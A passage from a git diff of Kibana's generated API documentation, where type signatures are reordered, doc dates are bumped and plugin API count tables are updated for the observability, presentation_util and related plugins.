keyof ", + " | keyof React.ClassAttributes | keyof _EuiFlyoutProps>, \"children\" | \"onError\" | \"hidden\" | \"color\" | \"alert\" | \"title\" | \"onChange\" | \"onKeyDown\" | \"onClick\" | \"key\" | \"id\" | \"css\" | \"security\" | \"defaultValue\" | \"lang\" | \"defaultChecked\" | \"suppressContentEditableWarning\" | \"suppressHydrationWarning\" | \"accessKey\" | \"contentEditable\" | \"contextMenu\" | \"dir\" | \"draggable\" | \"placeholder\" | \"slot\" | \"spellCheck\" | \"tabIndex\" | \"translate\" | \"radioGroup\" | \"about\" | \"datatype\" | \"inlist\" | \"prefix\" | \"property\" | \"resource\" | \"typeof\" | \"vocab\" | \"autoCapitalize\" | \"autoCorrect\" | \"autoSave\" | \"itemProp\" | \"itemScope\" | \"itemType\" | \"itemID\" | \"itemRef\" | \"results\" | \"unselectable\" | \"inputMode\" | \"is\" | \"aria-activedescendant\" | \"aria-atomic\" | \"aria-autocomplete\" | \"aria-busy\" | \"aria-checked\" | \"aria-colcount\" | \"aria-colindex\" | \"aria-colspan\" | \"aria-controls\" | \"aria-current\" | \"aria-describedby\" | \"aria-details\" | \"aria-disabled\" | \"aria-dropeffect\" | \"aria-errormessage\" | \"aria-expanded\" | \"aria-flowto\" | \"aria-grabbed\" | \"aria-haspopup\" | \"aria-hidden\" | \"aria-invalid\" | \"aria-keyshortcuts\" | \"aria-labelledby\" | \"aria-level\" | \"aria-live\" | \"aria-modal\" | \"aria-multiline\" | \"aria-multiselectable\" | \"aria-orientation\" | \"aria-owns\" | \"aria-placeholder\" | \"aria-posinset\" | \"aria-pressed\" | \"aria-readonly\" | \"aria-relevant\" | \"aria-required\" | \"aria-roledescription\" | \"aria-rowcount\" | \"aria-rowindex\" | \"aria-rowspan\" | \"aria-selected\" | \"aria-setsize\" | \"aria-sort\" | \"aria-valuemax\" | \"aria-valuemin\" | \"aria-valuenow\" | \"aria-valuetext\" | \"dangerouslySetInnerHTML\" | \"onCopy\" | \"onCopyCapture\" | \"onCut\" | \"onCutCapture\" | \"onPaste\" | \"onPasteCapture\" | \"onCompositionEnd\" | \"onCompositionEndCapture\" | \"onCompositionStart\" | \"onCompositionStartCapture\" | \"onCompositionUpdate\" | \"onCompositionUpdateCapture\" | \"onFocus\" | \"onFocusCapture\" | \"onBlur\" | \"onBlurCapture\" | \"onChangeCapture\" | \"onBeforeInput\" | \"onBeforeInputCapture\" | \"onInput\" | \"onInputCapture\" | \"onReset\" | \"onResetCapture\" | \"onSubmit\" | \"onSubmitCapture\" | \"onInvalid\" | \"onInvalidCapture\" | \"onLoad\" | \"onLoadCapture\" | \"onErrorCapture\" | \"onKeyDownCapture\" | \"onKeyPress\" | \"onKeyPressCapture\" | \"onKeyUp\" | \"onKeyUpCapture\" | \"onAbort\" | \"onAbortCapture\" | \"onCanPlay\" | \"onCanPlayCapture\" | \"onCanPlayThrough\" | \"onCanPlayThroughCapture\" | \"onDurationChange\" | \"onDurationChangeCapture\" | \"onEmptied\" | \"onEmptiedCapture\" | \"onEncrypted\" | \"onEncryptedCapture\" | \"onEnded\" | \"onEndedCapture\" | \"onLoadedData\" | \"onLoadedDataCapture\" | \"onLoadedMetadata\" | \"onLoadedMetadataCapture\" | \"onLoadStart\" | \"onLoadStartCapture\" | \"onPause\" | \"onPauseCapture\" | \"onPlay\" | \"onPlayCapture\" | \"onPlaying\" | \"onPlayingCapture\" | \"onProgress\" | \"onProgressCapture\" | \"onRateChange\" | \"onRateChangeCapture\" | \"onSeeked\" | \"onSeekedCapture\" | \"onSeeking\" | \"onSeekingCapture\" | \"onStalled\" | \"onStalledCapture\" | \"onSuspend\" | \"onSuspendCapture\" | \"onTimeUpdate\" | \"onTimeUpdateCapture\" | \"onVolumeChange\" | \"onVolumeChangeCapture\" | \"onWaiting\" | \"onWaitingCapture\" | \"onAuxClick\" | \"onAuxClickCapture\" | \"onClickCapture\" | \"onContextMenu\" | \"onContextMenuCapture\" | \"onDoubleClick\" | \"onDoubleClickCapture\" | \"onDrag\" | \"onDragCapture\" | \"onDragEnd\" | \"onDragEndCapture\" | \"onDragEnter\" | \"onDragEnterCapture\" | \"onDragExit\" | \"onDragExitCapture\" | \"onDragLeave\" | \"onDragLeaveCapture\" | \"onDragOver\" | \"onDragOverCapture\" | \"onDragStart\" | \"onDragStartCapture\" | \"onDrop\" | \"onDropCapture\" | \"onMouseDown\" | \"onMouseDownCapture\" | \"onMouseEnter\" | \"onMouseLeave\" | \"onMouseMove\" | \"onMouseMoveCapture\" | \"onMouseOut\" | \"onMouseOutCapture\" | \"onMouseOver\" | \"onMouseOverCapture\" | \"onMouseUp\" | \"onMouseUpCapture\" | \"onSelect\" | \"onSelectCapture\" | \"onTouchCancel\" | \"onTouchCancelCapture\" | \"onTouchEnd\" | \"onTouchEndCapture\" | \"onTouchMove\" | \"onTouchMoveCapture\" | \"onTouchStart\" | \"onTouchStartCapture\" | \"onPointerDown\" | \"onPointerDownCapture\" | \"onPointerMove\" | \"onPointerMoveCapture\" | \"onPointerUp\" | \"onPointerUpCapture\" | \"onPointerCancel\" | \"onPointerCancelCapture\" | \"onPointerEnter\" | \"onPointerEnterCapture\" | \"onPointerLeave\" | \"onPointerLeaveCapture\" | \"onPointerOver\" | \"onPointerOverCapture\" | \"onPointerOut\" | \"onPointerOutCapture\" | \"onGotPointerCapture\" | \"onGotPointerCaptureCapture\" | \"onLostPointerCapture\" | \"onLostPointerCaptureCapture\" | \"onScroll\" | \"onScrollCapture\" | \"onWheel\" | \"onWheelCapture\" | \"onAnimationStart\" | \"onAnimationStartCapture\" | \"onAnimationEnd\" | \"onAnimationEndCapture\" | \"onAnimationIteration\" | \"onAnimationIterationCapture\" | \"onTransitionEnd\" | \"onTransitionEndCapture\" | \"as\" | keyof ", "CommonProps", - " | \"title\" | \"alert\" | \"hidden\" | \"key\" | \"css\" | \"security\" | \"defaultValue\" | \"defaultChecked\" | \"suppressContentEditableWarning\" | \"suppressHydrationWarning\" | \"accessKey\" | \"contentEditable\" | \"contextMenu\" | \"dir\" | \"draggable\" | \"placeholder\" | \"slot\" | \"spellCheck\" | \"translate\" | \"radioGroup\" | \"about\" | \"datatype\" | \"inlist\" | \"prefix\" | \"property\" | \"resource\" | \"typeof\" | \"vocab\" | \"autoCapitalize\" | \"autoCorrect\" | \"autoSave\" | \"itemProp\" | \"itemScope\" | \"itemType\" | \"itemID\" | \"itemRef\" | \"results\" | \"unselectable\" | \"inputMode\" | \"is\" | \"as\" | \"alerts\" | keyof _EuiFlyoutProps | \"isInApp\" | \"observabilityRuleTypeRegistry\" | \"selectedAlertId\"> & { ref?: React.RefObject | ((instance: HTMLDivElement | null) => void) | null | undefined; }> & { readonly _result: ({ alert, alerts, isInApp, observabilityRuleTypeRegistry, onClose, selectedAlertId, }: AlertsFlyoutProps) => JSX.Element | null; }" + " | \"alerts\" | keyof _EuiFlyoutProps | \"isInApp\" | \"observabilityRuleTypeRegistry\" | \"selectedAlertId\"> & { ref?: React.RefObject | ((instance: HTMLDivElement | null) => void) | null | undefined; }> & { readonly _result: ({ alert, alerts, isInApp, observabilityRuleTypeRegistry, onClose, selectedAlertId, }: AlertsFlyoutProps) => JSX.Element | null; }" ], "path": "x-pack/plugins/observability/public/index.ts", "deprecated": false, @@ -3402,7 +3402,7 @@ "label": "ruleTypeRegistry", "description": [], "signature": [ - "{ list: () => ", + "{ get: (id: string) => ", { "pluginId": "triggersActionsUi", "scope": "public", @@ -3418,7 +3418,7 @@ "section": "def-common.RuleTypeParams", "text": "RuleTypeParams" }, - ">[]; get: (id: string) => ", + ">; list: () => ", { "pluginId": "triggersActionsUi", "scope": "public", @@ -3434,7 +3434,7 @@ "section": "def-common.RuleTypeParams", "text": "RuleTypeParams" }, - ">; register: (objectType: ", + ">[]; register: (objectType: ", { "pluginId": "triggersActionsUi", "scope": "public", @@ -3463,11 +3463,11 @@ "label": "actionTypeRegistry", "description": [], "signature": [ - "{ list: () => ", + "{ get: (id: string) => ", "ActionTypeModel", - "[]; get: (id: string) => ", + "; list: () => ", "ActionTypeModel", - "; register: (objectType: ", + "[]; register: (objectType: ", "ActionTypeModel", ") => void; has: (id: string) => boolean; }" ], @@ -5107,11 +5107,11 @@ "DisambiguateSet", ", Omit, \"href\">> & Omit, \"href\">) | (", "DisambiguateSet", - ", \"href\">, React.ButtonHTMLAttributes> & React.ButtonHTMLAttributes))), \"color\" | \"target\" | \"onClick\" | \"rel\"> & { size?: ItemSize | undefined; color?: Color | undefined; label: React.ReactNode; isActive?: boolean | undefined; isDisabled?: boolean | undefined; href?: string | undefined; target?: string | undefined; rel?: string | undefined; iconType?: ", + ", \"href\">, React.ButtonHTMLAttributes> & React.ButtonHTMLAttributes))), \"color\" | \"onClick\" | \"rel\" | \"target\"> & { size?: ItemSize | undefined; color?: Color | undefined; label: React.ReactNode; isActive?: boolean | undefined; isDisabled?: boolean | undefined; href?: string | undefined; target?: string | undefined; rel?: string | undefined; iconType?: ", "IconType", " | undefined; iconProps?: Omit<", "EuiIconProps", - ", \"type\"> | undefined; icon?: React.ReactElement> | undefined; showToolTip?: boolean | undefined; extraAction?: ({ type?: \"button\" | \"reset\" | \"submit\" | undefined; } & ", + ", \"type\"> | undefined; icon?: React.ReactElement> | undefined; showToolTip?: boolean | undefined; extraAction?: ({ type?: \"reset\" | \"button\" | \"submit\" | undefined; } & ", "EuiButtonIconProps", " & { onClick?: React.MouseEventHandler | undefined; } & React.ButtonHTMLAttributes & { buttonRef?: React.Ref | undefined; } & { alwaysShow?: boolean | undefined; }) | undefined; onClick?: React.MouseEventHandler | undefined; wrapText?: boolean | undefined; buttonRef?: React.Ref | undefined; }" ], @@ -5495,7 +5495,61 @@ "label": "client", "description": [], "signature": [ - "{ name: string | symbol; transform: ", + "{ get: { (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptionsWithOutMeta", + " | undefined): Promise<", + "GetResponse", + ">; (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptionsWithMeta", + " | undefined): Promise<", + "TransportResult", + "<", + "GetResponse", + ", unknown>>; (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptions", + " | undefined): Promise<", + "GetResponse", + ">; }; delete: { (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptionsWithOutMeta", + " | undefined): Promise<", + "WriteResponseBase", + ">; (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptionsWithMeta", + " | undefined): Promise<", + "TransportResult", + "<", + "WriteResponseBase", + ", unknown>>; (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptions", + " | undefined): Promise<", + "WriteResponseBase", + ">; }; cluster: ", + "default", + "; eql: ", "default", "; search: { >; }; cluster: ", - "default", - "; eql: ", - "default", - "; create: { (this: That, params: ", + ">; }; create: { (this: That, params: ", "CreateRequest", " | ", "CreateRequest", @@ -5563,7 +5613,7 @@ "default", "; security: ", "default", - "; index: { (this: That, params: ", + "; name: string | symbol; index: { (this: That, params: ", "IndexRequest", " | ", "IndexRequest", @@ -5589,33 +5639,7 @@ "TransportRequestOptions", " | undefined): Promise<", "WriteResponseBase", - ">; }; get: { (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptionsWithOutMeta", - " | undefined): Promise<", - "GetResponse", - ">; (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptionsWithMeta", - " | undefined): Promise<", - "TransportResult", - "<", - "GetResponse", - ", unknown>>; (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptions", - " | undefined): Promise<", - "GetResponse", - ">; }; update: { (this: That, params: ", + ">; }; update: { (this: That, params: ", "UpdateRequest", " | ", "UpdateRequest", @@ -5641,33 +5665,7 @@ "TransportRequestOptions", " | undefined): Promise<", "UpdateResponse", - ">; }; delete: { (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptionsWithOutMeta", - " | undefined): Promise<", - "WriteResponseBase", - ">; (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptionsWithMeta", - " | undefined): Promise<", - "TransportResult", - "<", - "WriteResponseBase", - ", unknown>>; (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptions", - " | undefined): Promise<", - "WriteResponseBase", - ">; }; [kInternal]: symbol | null; [kAsyncSearch]: symbol | null; [kAutoscaling]: symbol | null; [kCat]: symbol | null; [kCcr]: symbol | null; [kCluster]: symbol | null; [kDanglingIndices]: symbol | null; [kEnrich]: symbol | null; [kEql]: symbol | null; [kFeatures]: symbol | null; [kFleet]: symbol | null; [kGraph]: symbol | null; [kIlm]: symbol | null; [kIndices]: symbol | null; [kIngest]: symbol | null; [kLicense]: symbol | null; [kLogstash]: symbol | null; [kMigration]: symbol | null; [kMl]: symbol | null; [kMonitoring]: symbol | null; [kNodes]: symbol | null; [kRollup]: symbol | null; [kSearchableSnapshots]: symbol | null; [kSecurity]: symbol | null; [kShutdown]: symbol | null; [kSlm]: symbol | null; [kSnapshot]: symbol | null; [kSql]: symbol | null; [kSsl]: symbol | null; [kTasks]: symbol | null; [kTextStructure]: symbol | null; [kTransform]: symbol | null; [kWatcher]: symbol | null; [kXpack]: symbol | null; transport: ", + ">; }; [kInternal]: symbol | null; [kAsyncSearch]: symbol | null; [kAutoscaling]: symbol | null; [kCat]: symbol | null; [kCcr]: symbol | null; [kCluster]: symbol | null; [kDanglingIndices]: symbol | null; [kEnrich]: symbol | null; [kEql]: symbol | null; [kFeatures]: symbol | null; [kFleet]: symbol | null; [kGraph]: symbol | null; [kIlm]: symbol | null; [kIndices]: symbol | null; [kIngest]: symbol | null; [kLicense]: symbol | null; [kLogstash]: symbol | null; [kMigration]: symbol | null; [kMl]: symbol | null; [kMonitoring]: symbol | null; [kNodes]: symbol | null; [kRollup]: symbol | null; [kSearchableSnapshots]: symbol | null; [kSecurity]: symbol | null; [kShutdown]: symbol | null; [kSlm]: symbol | null; [kSnapshot]: symbol | null; [kSql]: symbol | null; [kSsl]: symbol | null; [kTasks]: symbol | null; [kTextStructure]: symbol | null; [kTransform]: symbol | null; [kWatcher]: symbol | null; [kXpack]: symbol | null; transport: ", "default", "; helpers: ", "default", @@ -6627,6 +6625,8 @@ "TermvectorsResponse", ">; }; textStructure: ", "default", + "; transform: ", + "default", "; updateByQuery: { (this: That, params: ", "UpdateByQueryRequest", " | ", @@ -7905,7 +7905,7 @@ "label": "TimeUnitChar", "description": [], "signature": [ - "\"d\" | \"s\" | \"m\" | \"h\"" + "\"d\" | \"h\" | \"m\" | \"s\"" ], "path": "x-pack/plugins/observability/common/utils/formatters/duration.ts", "deprecated": false, diff --git a/api_docs/observability.mdx b/api_docs/observability.mdx index a396a1f4a5cc5..4bc30e3b264af 100644 --- a/api_docs/observability.mdx +++ b/api_docs/observability.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/observability title: "observability" image: https://source.unsplash.com/400x175/?github description: API docs for the observability plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'observability'] --- import observabilityObj from './observability.devdocs.json'; diff --git a/api_docs/osquery.mdx b/api_docs/osquery.mdx index a43558a7decd9..7bc8ecfff0f9a 100644 --- a/api_docs/osquery.mdx +++ b/api_docs/osquery.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/osquery title: "osquery" image: https://source.unsplash.com/400x175/?github description: API docs for the osquery plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'osquery'] --- import osqueryObj from './osquery.devdocs.json'; diff --git a/api_docs/plugin_directory.mdx b/api_docs/plugin_directory.mdx index 9f32ff508650d..78835ab2ec375 100644 --- a/api_docs/plugin_directory.mdx +++ b/api_docs/plugin_directory.mdx @@ -7,7 +7,7 @@ id: kibDevDocsPluginDirectory slug: /kibana-dev-docs/api-meta/plugin-api-directory title: Directory description: Directory of public APIs available through plugins or packages. -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana'] --- @@ -15,13 +15,13 @@ tags: ['contributor', 'dev', 'apidocs', 'kibana'] | Count | Plugins or Packages with a
public API | Number of teams | |--------------|----------|------------------------| -| 403 | 337 | 37 | +| 404 | 338 | 37 | ### Public API health stats | API Count | Any Count | Missing comments | Missing exports | |--------------|----------|-----------------|--------| -| 29205 | 175 | 19670 | 911 | +| 29304 | 175 | 19745 | 910 | ## Plugin Directory @@ -33,7 +33,7 @@ tags: ['contributor', 'dev', 'apidocs', 'kibana'] | | [Response Ops](https://github.com/orgs/elastic/teams/response-ops) | - | 368 | 0 | 359 | 21 | | | [APM UI](https://github.com/orgs/elastic/teams/apm-ui) | The user interface for Elastic APM | 39 | 0 | 39 | 53 | | | [Kibana Core](https://github.com/orgs/elastic/teams/kibana-core) | - | 9 | 0 | 9 | 0 | -| | [App Services](https://github.com/orgs/elastic/teams/kibana-app-services) | Considering using bfetch capabilities when fetching large amounts of data. This services supports batching HTTP requests and streaming responses back. | 78 | 1 | 69 | 2 | +| | [App Services](https://github.com/orgs/elastic/teams/kibana-app-services) | Considering using bfetch capabilities when fetching large amounts of data. This services supports batching HTTP requests and streaming responses back. | 80 | 1 | 71 | 2 | | | [Kibana Presentation](https://github.com/orgs/elastic/teams/kibana-presentation) | Adds Canvas application to Kibana | 9 | 0 | 8 | 3 | | | [ResponseOps](https://github.com/orgs/elastic/teams/response-ops) | The Case management system in Kibana | 82 | 0 | 66 | 29 | | | [Vis Editors](https://github.com/orgs/elastic/teams/kibana-vis-editors) | - | 272 | 2 | 253 | 9 | @@ -63,8 +63,8 @@ tags: ['contributor', 'dev', 'apidocs', 'kibana'] | | [Vis Editors](https://github.com/orgs/elastic/teams/kibana-vis-editors) | The Event Annotation service contains expressions for event annotations | 95 | 0 | 95 | 6 | | | [Response Ops](https://github.com/orgs/elastic/teams/response-ops) | - | 100 | 0 | 100 | 9 | | | [Kibana Presentation](https://github.com/orgs/elastic/teams/kibana-presentation) | Adds 'error' renderer to expressions | 17 | 0 | 15 | 2 | -| | [Vis Editors](https://github.com/orgs/elastic/teams/kibana-vis-editors) | Expression Gauge plugin adds a `gauge` renderer and function to the expression plugin. The renderer will display the `gauge` chart. | 61 | 0 | 61 | 2 | -| | [Vis Editors](https://github.com/orgs/elastic/teams/kibana-vis-editors) | Expression Heatmap plugin adds a `heatmap` renderer and function to the expression plugin. The renderer will display the `heatmap` chart. | 107 | 0 | 103 | 3 | +| | [Vis Editors](https://github.com/orgs/elastic/teams/kibana-vis-editors) | Expression Gauge plugin adds a `gauge` renderer and function to the expression plugin. The renderer will display the `gauge` chart. | 57 | 0 | 57 | 2 | +| | [Vis Editors](https://github.com/orgs/elastic/teams/kibana-vis-editors) | Expression Heatmap plugin adds a `heatmap` renderer and function to the expression plugin. The renderer will display the `heatmap` chart. | 105 | 0 | 101 | 3 | | | [Kibana Presentation](https://github.com/orgs/elastic/teams/kibana-presentation) | Adds 'image' function and renderer to expressions | 26 | 0 | 26 | 0 | | | [Vis Editors](https://github.com/orgs/elastic/teams/kibana-vis-editors) | Adds a `metric` renderer and function to the expression plugin. The renderer will display the `legacy metric` chart. | 48 | 0 | 48 | 1 | | | [Kibana Presentation](https://github.com/orgs/elastic/teams/kibana-presentation) | Adds 'metric' function and renderer to expressions | 32 | 0 | 27 | 0 | @@ -74,13 +74,13 @@ tags: ['contributor', 'dev', 'apidocs', 'kibana'] | | [Kibana Presentation](https://github.com/orgs/elastic/teams/kibana-presentation) | Adds 'revealImage' function and renderer to expressions | 14 | 0 | 14 | 3 | | | [Kibana Presentation](https://github.com/orgs/elastic/teams/kibana-presentation) | Adds 'shape' function and renderer to expressions | 148 | 0 | 146 | 0 | | | [Vis Editors](https://github.com/orgs/elastic/teams/kibana-vis-editors) | Expression Tagcloud plugin adds a `tagcloud` renderer and function to the expression plugin. The renderer will display the `Wordcloud` chart. | 7 | 0 | 7 | 0 | -| | [Vis Editors](https://github.com/orgs/elastic/teams/kibana-vis-editors) | Expression XY plugin adds a `xy` renderer and function to the expression plugin. The renderer will display the `xy` chart. | 151 | 0 | 141 | 12 | +| | [Vis Editors](https://github.com/orgs/elastic/teams/kibana-vis-editors) | Expression XY plugin adds a `xy` renderer and function to the expression plugin. The renderer will display the `xy` chart. | 152 | 0 | 142 | 11 | | | [App Services](https://github.com/orgs/elastic/teams/kibana-app-services) | Adds expression runtime to Kibana | 2183 | 17 | 1729 | 5 | | | [Kibana Core](https://github.com/orgs/elastic/teams/kibana-core) | - | 222 | 0 | 95 | 2 | | | [App Services](https://github.com/orgs/elastic/teams/kibana-app-services) | Index pattern fields and ambiguous values formatters | 288 | 5 | 249 | 3 | | | [Machine Learning UI](https://github.com/orgs/elastic/teams/ml-ui) | The file upload plugin contains components and services for uploading a file, analyzing its data, and then importing the data into an Elasticsearch index. Supported file types include CSV, TSV, newline-delimited JSON and GeoJSON. | 62 | 0 | 62 | 2 | -| | [@elastic/kibana-app-services](https://github.com/orgs/elastic/teams/team:AppServicesUx) | File upload, download, sharing, and serving over HTTP implementation in Kibana. | 222 | 0 | 3 | 2 | -| | [Fleet](https://github.com/orgs/elastic/teams/fleet) | - | 955 | 3 | 860 | 9 | +| | [@elastic/kibana-app-services](https://github.com/orgs/elastic/teams/team:AppServicesUx) | File upload, download, sharing, and serving over HTTP implementation in Kibana. | 236 | 0 | 3 | 2 | +| | [Fleet](https://github.com/orgs/elastic/teams/fleet) | - | 957 | 3 | 862 | 9 | | | [Kibana Core](https://github.com/orgs/elastic/teams/kibana-core) | - | 68 | 0 | 14 | 5 | | globalSearchBar | [Kibana Core](https://github.com/orgs/elastic/teams/kibana-core) | - | 0 | 0 | 0 | 0 | | globalSearchProviders | [Kibana Core](https://github.com/orgs/elastic/teams/kibana-core) | - | 0 | 0 | 0 | 0 | @@ -106,7 +106,7 @@ tags: ['contributor', 'dev', 'apidocs', 'kibana'] | | [Security detections response](https://github.com/orgs/elastic/teams/security-detections-response) | - | 202 | 0 | 90 | 49 | | logstash | [Logstash](https://github.com/orgs/elastic/teams/logstash) | - | 0 | 0 | 0 | 0 | | | [Vis Editors](https://github.com/orgs/elastic/teams/kibana-vis-editors) | - | 41 | 0 | 41 | 6 | -| | [GIS](https://github.com/orgs/elastic/teams/kibana-gis) | - | 255 | 0 | 252 | 25 | +| | [GIS](https://github.com/orgs/elastic/teams/kibana-gis) | - | 256 | 0 | 255 | 25 | | | [GIS](https://github.com/orgs/elastic/teams/kibana-gis) | - | 67 | 0 | 67 | 0 | | | [Machine Learning UI](https://github.com/orgs/elastic/teams/ml-ui) | This plugin provides access to the machine learning features provided by Elastic. | 244 | 9 | 71 | 30 | | | [Stack Monitoring](https://github.com/orgs/elastic/teams/stack-monitoring-ui) | - | 11 | 0 | 9 | 1 | @@ -144,7 +144,7 @@ tags: ['contributor', 'dev', 'apidocs', 'kibana'] | | [Kibana Telemetry](https://github.com/orgs/elastic/teams/kibana-telemetry) | - | 31 | 0 | 26 | 6 | | | [Kibana Telemetry](https://github.com/orgs/elastic/teams/kibana-telemetry) | - | 1 | 0 | 1 | 0 | | | [Kibana Telemetry](https://github.com/orgs/elastic/teams/kibana-telemetry) | - | 11 | 0 | 10 | 0 | -| | [Protections Experience Team](https://github.com/orgs/elastic/teams/protections-experience) | Elastic threat intelligence helps you see if you are open to or have been subject to current or historical known threats | 6 | 0 | 6 | 1 | +| | [Protections Experience Team](https://github.com/orgs/elastic/teams/protections-experience) | Elastic threat intelligence helps you see if you are open to or have been subject to current or historical known threats | 15 | 0 | 3 | 1 | | | [Security solution](https://github.com/orgs/elastic/teams/security-solution) | - | 447 | 1 | 342 | 32 | | | [Machine Learning UI](https://github.com/orgs/elastic/teams/ml-ui) | This plugin provides access to the transforms features provided by Elastic. Transforms enable you to convert existing Elasticsearch indices into summarized indices, which provide opportunities for new insights and analytics. | 4 | 0 | 4 | 1 | | translations | [Kibana Localization](https://github.com/orgs/elastic/teams/kibana-localization) | - | 0 | 0 | 0 | 0 | @@ -192,6 +192,7 @@ tags: ['contributor', 'dev', 'apidocs', 'kibana'] | | [Owner missing] | - | 11 | 0 | 11 | 0 | | | [Owner missing] | - | 10 | 0 | 10 | 0 | | | [Owner missing] | - | 18 | 0 | 9 | 1 | +| | [Owner missing] | - | 76 | 0 | 76 | 0 | | | [Owner missing] | - | 7 | 0 | 2 | 0 | | | [Owner missing] | - | 3 | 0 | 3 | 0 | | | [Owner missing] | - | 62 | 0 | 17 | 1 | diff --git a/api_docs/presentation_util.devdocs.json b/api_docs/presentation_util.devdocs.json index 07de3fd699575..c7d62fa7d2661 100644 --- a/api_docs/presentation_util.devdocs.json +++ b/api_docs/presentation_util.devdocs.json @@ -2264,7 +2264,7 @@ "label": "getProjects", "description": [], "signature": [ - "(solutions?: (\"presentation\" | \"dashboard\" | \"canvas\")[] | undefined) => Record<\"labs:dashboard:deferBelowFold\" | \"labs:dashboard:dashboardControls\" | \"labs:canvas:byValueEmbeddable\", ", + "(solutions?: (\"dashboard\" | \"canvas\" | \"presentation\")[] | undefined) => Record<\"labs:dashboard:deferBelowFold\" | \"labs:dashboard:dashboardControls\" | \"labs:canvas:byValueEmbeddable\", ", { "pluginId": "presentationUtil", "scope": "common", @@ -2285,7 +2285,7 @@ "label": "solutions", "description": [], "signature": [ - "(\"presentation\" | \"dashboard\" | \"canvas\")[] | undefined" + "(\"dashboard\" | \"canvas\" | \"presentation\")[] | undefined" ], "path": "src/plugins/presentation_util/public/services/labs.ts", "deprecated": false, @@ -3650,7 +3650,7 @@ "label": "solutions", "description": [], "signature": [ - "(\"presentation\" | \"dashboard\" | \"canvas\")[]" + "(\"dashboard\" | \"canvas\" | \"presentation\")[]" ], "path": "src/plugins/presentation_util/common/labs.ts", "deprecated": false @@ -3861,7 +3861,7 @@ "label": "SolutionName", "description": [], "signature": [ - "\"presentation\" | \"dashboard\" | \"canvas\"" + "\"dashboard\" | \"canvas\" | \"presentation\"" ], "path": "src/plugins/presentation_util/common/labs.ts", "deprecated": false, diff --git a/api_docs/presentation_util.mdx b/api_docs/presentation_util.mdx index b3f6432a189d7..a803432619749 100644 --- a/api_docs/presentation_util.mdx +++ b/api_docs/presentation_util.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/presentationUtil title: "presentationUtil" image: https://source.unsplash.com/400x175/?github description: API docs for the presentationUtil plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'presentationUtil'] --- import presentationUtilObj from './presentation_util.devdocs.json'; diff --git a/api_docs/remote_clusters.mdx b/api_docs/remote_clusters.mdx index 497431e2dc096..5d518b2c75b0d 100644 --- a/api_docs/remote_clusters.mdx +++ b/api_docs/remote_clusters.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/remoteClusters title: "remoteClusters" image: https://source.unsplash.com/400x175/?github description: API docs for the remoteClusters plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'remoteClusters'] --- import remoteClustersObj from './remote_clusters.devdocs.json'; diff --git a/api_docs/reporting.mdx b/api_docs/reporting.mdx index 2cf16933a1e68..442c61ad6812a 100644 --- a/api_docs/reporting.mdx +++ b/api_docs/reporting.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/reporting title: "reporting" image: https://source.unsplash.com/400x175/?github description: API docs for the reporting plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'reporting'] --- import reportingObj from './reporting.devdocs.json'; diff --git a/api_docs/rollup.mdx b/api_docs/rollup.mdx index 6a1368dee3285..f56a7960339b9 100644 --- a/api_docs/rollup.mdx +++ b/api_docs/rollup.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/rollup title: "rollup" image: https://source.unsplash.com/400x175/?github description: API docs for the rollup plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'rollup'] --- import rollupObj from './rollup.devdocs.json'; diff --git a/api_docs/rule_registry.devdocs.json b/api_docs/rule_registry.devdocs.json index 20d37238bea29..e2ef0bd007a6b 100644 --- a/api_docs/rule_registry.devdocs.json +++ b/api_docs/rule_registry.devdocs.json @@ -1500,9 +1500,9 @@ "section": "def-common.WithoutReservedActionGroups", "text": "WithoutReservedActionGroups" }, - ">) => Promise; id: string; name: string; validate?: { params?: ", + ">) => Promise; validate?: { params?: ", "RuleTypeParamsValidator", - " | undefined; } | undefined; cancelAlertsOnRuleTimeout?: boolean | undefined; 